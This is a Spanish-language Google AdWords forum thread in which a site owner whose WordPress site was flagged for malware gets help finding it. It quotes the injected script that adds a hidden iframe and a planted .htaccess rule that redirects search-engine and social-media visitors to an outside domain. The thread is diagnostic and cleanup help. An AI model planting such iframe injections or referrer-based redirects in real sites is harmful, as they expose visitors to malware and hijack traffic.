262 anunciantes en línea
262 anunciantes en línea
¿Eres nuevo o estas pensando en comenzar a utilizar AdWords? Aprende a configurar una campaña, evalúa la inversión que realizas y descubre la mejor forma de llevar el manejo de tu cuenta.
Guiame
favorite_border
Responder

Cuenta bloqueada / Anuncios no aptos / Pagina con Malware

Novato ✭ ✭
# 1
Novato ✭ ✭

Hola, me gustaría saber si alguien tiene idea de como averiguar qué le pasa a mi web, que adwords me tiene hecha la cruz. El en pasado se me metió en stopbadware,org porque al parecer mi htaccess tenia algo raro, pero lo solucioné y me quitaron de las listas negras y todo iba bien. Pero tras 2 semanas (sin tocar la web) google empezó a mandarme advertencias de malware y me acabó parando la campaña y demás. Me gustaría saber cómo arreglar esto, ya que ni llamando al 901 de google me hacen nada.

La web es www.neuocasion.es

Gracias

Revisa tu web en Webmaster Tools

Estudiante ✭ ✭ ✭
# 2
Estudiante ✭ ✭ ✭

Buenas Kheops,

Yo lo primero que haría es agregar la web neuocasion.es a Webmaster Tools y revisar en el apartado de Salud que no tengas nada raro en tu web.

Comprueba esto primero antes de seguir especulando. No creo que Google AdWords te envíe advertencias sin motivo alguno.

Un saludo.

Se me olvidó comentar que así es como lo arreglé en un pr...

Novato ✭ ✭
# 3
Novato ✭ ✭

Se me olvidó comentar que así es como lo arreglé en un principio y ahora webmaster tools no me dice que pase nada con la web.

Gracias por contestar.

Solicitar revisión

Estudiante ✭ ✭ ✭
# 4
Estudiante ✭ ✭ ✭

Has visto esta documentación y la has realizado al pie de la letra:

http://support.google.com/webmasters/bin/answer.py?hl=es&answer=168328

Un saludo.

Siguiente paso

Estudiante ✭ ✭ ✭
# 5
Estudiante ✭ ✭ ✭

Y ahora te envio otro link donde te explica como pedir la solicitud de revision o por lo contrario si haciendo esa revisión no desaparece, al final de todo tienes un link de contacto del servicio técnico de Google AdWords.

Espero haberte ayudado, ya más no puedo hacer.

Emoticono feliz

Se me olvidaba el link xD

Estudiante ✭ ✭ ✭
# 6
Estudiante ✭ ✭ ✭

A ver yo lo que necesito es saber donde está lo que a goo...

Novato ✭ ✭
# 7
Novato ✭ ✭

A ver yo lo que necesito es saber donde está lo que a google no le gusta. Yo solo tengo una página muy simplona de Wordpress, no hay historias de malware ni nada.

Hola Kheops,   Echando un vistazo a la index de neuocasio...

[ Editado ]
Graduado ✭
# 8
Graduado ✭

Hola Kheops,

Echando un vistazo a la index de neuocasion.es he podido ver que efectivamente tienes un malware.

Para solucionarlo debes editar el código de tu index y eliminar el siguiente código ( líneas 13 a 23 del head):

<script>
var _q = document.createElement('iframe'),
n = 'setAttribute';
q.style.position = 'absolute';
q.style.width = '16px';
q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7d03d1087e22') + 1);
q.style.left = '-6200px';
document.write('<div id=\'pzadv\'></div>');
document.getElementById('pzadv').appendChild(_q);
</script>

Con esto deberías solucionar el problema.

Saludos,
Angel

Ostras muchisimas gracias!!! Como sabes eso? A mi es que...

Novato ✭ ✭
# 9
Novato ✭ ✭
Ostras muchisimas gracias!!! Como sabes eso? A mi es que con lo que sé no me da. Podrías darme alguna idea de cómo ha llegado eso a mi index? Tengo problemas de seguridad?

un saludo y mil gracias.

Y también saber si esto es malware, que me ha aparecido e...

Novato ✭ ✭
# 10
Novato ✭ ✭
Y también saber si esto es malware, que me ha aparecido en el .htaccess solo despues de haberlo limiado yo mismo a mano!!

#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://methuenedge.com/stats.php [R=301,L]
</IfModule>
#/c3284d#